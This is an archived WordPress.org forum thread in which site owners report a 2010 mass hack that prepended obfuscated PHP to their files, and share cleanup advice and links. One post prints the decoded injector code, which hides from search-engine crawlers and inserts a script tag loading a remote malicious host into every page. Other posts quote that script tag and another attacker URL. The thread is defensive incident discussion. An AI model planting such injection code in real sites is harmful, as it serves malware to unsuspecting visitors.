WordPress.org

Ready to get started?Download WordPress

Forums

127

2.9.2 site hacked (188 posts)

  1. ardvark
    Member
    Posted 3 years ago #

    I visited my WP 2.9.2 site today to get a warning about my site having malware associated with it. Looking at the source, I see a script entry in the HTML body going to http://zettapetta.com/js.php

    Looking at the index.php file, I see that the first line has been hacked with an eval command and a lot of garbage that obviously comprises part of the hack. The timestamps of a lot of WP files has been changed, indicating that they were modified sometime yesterday afternoon.

    Anyone else seen this hack yet; is there a fix? I only found one or two mentions of this online, but all my plugins are up to date and I'm not sure how to ensure this won't happen again after I do a restore from backup on the site.

    Thanks,
    Matt

  2. ardvark
    Member
    Posted 3 years ago #

    FYI, I don't have any indication that my hosting password was compromised, since it was very secure and I haven't seen damage apart from the WP site.

  3. Daniel Cid
    Member
    Posted 3 years ago #

    Hey,

    We are seeing lots of sites hacked with the same code today:

    http://blog.sucuri.net/2010/05/new-attack-today-against-wordpress.html

    http://sucuri.net/malware/entry/MW:MROBH:1

    Where is your site being hosted?

  4. Steve D
    Member
    Posted 3 years ago #

    Maybe they should contact this guy. He seems to know what he's doing.

    http://www.youtube.com/watch?v=nabz7t65eUM

  5. Daniel Cid
    Member
    Posted 3 years ago #

    Steve D: Wow. I am wondering if that has been fixed already.

    But in this latest issues, the sites are not restricted to one hosting provider..

  6. Emanuele Pisapia
    Member
    Posted 3 years ago #

    Hello my sites in wordpress have the same problems...

    All the website made with wordpress have a strange js code that print a iframe...

    How can i fix it...?

    P.S. They are not on Network Solutions

  7. Daniel Cid
    Member
    Posted 3 years ago #

    dragoonslair: Where is your site hosted?

    Check your footer.php, because in one case just this file was hacked. On others, everything was.

  8. ardvark
    Member
    Posted 3 years ago #

    I'm on Dreamhost, and the links above are exactly the issue.
    Also:
    http://www.wpsecuritylock.com/breaking-news-wordpress-hacked-with-zettapetta-on-dreamhost/

  9. mclanea
    Member
    Posted 3 years ago #

    I have about 10 sites infected. All hosted on Bluehost.

  10. Daniel Cid
    Member
    Posted 3 years ago #

    Does anyone here that got infected have a site with Apache logging enabled?

    We would love to see the logs if anyone can share.

  11. mclanea
    Member
    Posted 3 years ago #

    I've taken all of my sites offline until we can sort this out.

    Will there be a security release from WP?

  12. Daniel Cid
    Member
    Posted 3 years ago #

    No one knows yet how they got in. I am assuming it is not a bug on WordPress itself otherwise the chaos would be much bigger.

    Maybe a plugin, stolen password?

  13. andrewacomb
    Member
    Posted 3 years ago #

    All my sites were hacked also.

    Running on GoDaddy servers and running WP 2.9.1

    Every single PHP file on the ENTIRE site has the malicious Base 64 code at the top. Didn't miss a single PHP file.

  14. andrewacomb
    Member
    Posted 3 years ago #

    Here is the Base 64 code "decoded", well sort of! Interesting, notice the googlebot and yahoo code.

    if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return base64_decode("<script src="http://indesignstudioinfo.com/ls.php"></script>"); } return ""; } } if(!function_exists('gzdecode')){ function gzdecode(<script src="http://indesignstudioinfo.com/ls.php"></script>){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } }

    You can see at the bottom where it's "looking" for the BODY tag.

  15. mclanea
    Member
    Posted 3 years ago #

    Other sites I manage on Hostgator and even Bluehost were not effected.

    For now... just killed all of the sites by replacing the index file.

  16. clundie
    Member
    Posted 3 years ago #

    This happened to me today, on a site hosted with godaddy, which doesn't run WordPress and never has.

  17. Daniel Cid
    Member
    Posted 3 years ago #

    clundie: wow... On a site without wordpress?

  18. clundie
    Member
    Posted 3 years ago #

    Yes, never had WordPress installed on my site. Just a few .php files written by me, on a mostly static site. I don't have scripts to allow file uploads or anything like that. All the .php files got modified as described above. Now - my site is on shared hosting, so it's possible there was a WordPress site was hosted on the same server. My file permissions were set so that only I (the owner) could write/modify them, but maybe someone figured out how to bypass that. In any case I changed all my passwords, which were strong and unique. I also use a Mac & there is zero chance of a virus on it. Ironically I was already planning to leave Godaddy next week.

  19. jkelly11
    Member
    Posted 3 years ago #

    This script has been placed somewhere in the code that pulls my rss feed and I can't find it. Help!

    <script src="http://indesignstudioinfo.com/ls.php"></script>

    If you try to pull my feed, that's the error you get (www.thenewpioneersquare.com/feed) and I can't find the file that the code is in. I've fixed all of my other files, but this is nowhere.

    Does anyone know where I can find the file to remove this code? I've been looking in files for the past 2 hours and have found nothing so far.

    Thanks!!!!

  20. James
    Happiness Engineer
    Posted 3 years ago #

  21. cogmios
    Member
    Posted 3 years ago #

    from what i read on the other forums chmod-ing the files to non 'open' should help.

  22. Steve D
    Member
    Posted 3 years ago #

    FTP and File Manager access down now at NS. At least on our server. Can't access my own files.

    Says my own password and user ID is incorrect.

    Total chaos.

  23. Daniel Cid
    Member
    Posted 3 years ago #

    jkelly11: This file is hidden from an encoded PHP string on all your files.

    You can get more info here:
    http://sucuri.net/malware/entry/MW:MROBH:1

  24. Steve D
    Member
    Posted 3 years ago #

    Be cautious people have been getting infected just by checking their own sites.

  25. jkelly11
    Member
    Posted 3 years ago #

    Thanks @dd -- I've deleted a lot of that code in the php string (in my case, it infected all of my .php) files, so I don't understand why I'm still getting the error on my rss feed.

    Are you not able to just delete the inserted code and clean it up?

    I'm a little nervous to do the whole backup, erase, redo (because of how new I am to wordpress). I was hoping to take care of it by just finding the code.

  26. Steve D
    Member
    Posted 3 years ago #

    dd@sucuri.net

    The problem is the criminals are launching everything in the book at us. It's like dodging bullets at this point. You clean up, and then another surprise shows up out of nowhere totally unrelated to the previous hack and a completely new technique.

    They are getting a hold of and compromising everything. Mail, FTP, Site, etc., etc.

    And who the heck knows what else at this point.

  27. Daniel Cid
    Member
    Posted 3 years ago #

    jkelly11: You probably missed a file or two. Specially inside the themes, wp-includes or plugins. Shoot me an email and I can send an script to automatically do it for you.

  28. Steve D
    Member
    Posted 3 years ago #

    Error: Authentication failed.
    Error: Critical error
    Error: Could not connect to server

    Obviously you can't check and try to protect your web site assets either when SFTP returns this all day.

  29. Go Daddy
    Go Daddy Support
    Posted 3 years ago #

    @clundie
    This is not necessarily specific to WordPress, that's just one of the more popular apps. The real concern is insecure PHP code, which is more likely to exist in apps that haven't been properly updated.

    If there's another installation that's been exploited in the same hosting account, it could affect your other sites, but not across accounts or across customers on the same server.

    Our security team can take a look by submitting your information here: http://fwd4.me/Mrd

    Alicia

  30. Daniel Cid
    Member
    Posted 3 years ago #

    Hey all,

    Simple script to automatically clean this up for you:

    http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

    I just cleaned a few sites using it and takes less then 5 minutes.

127

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags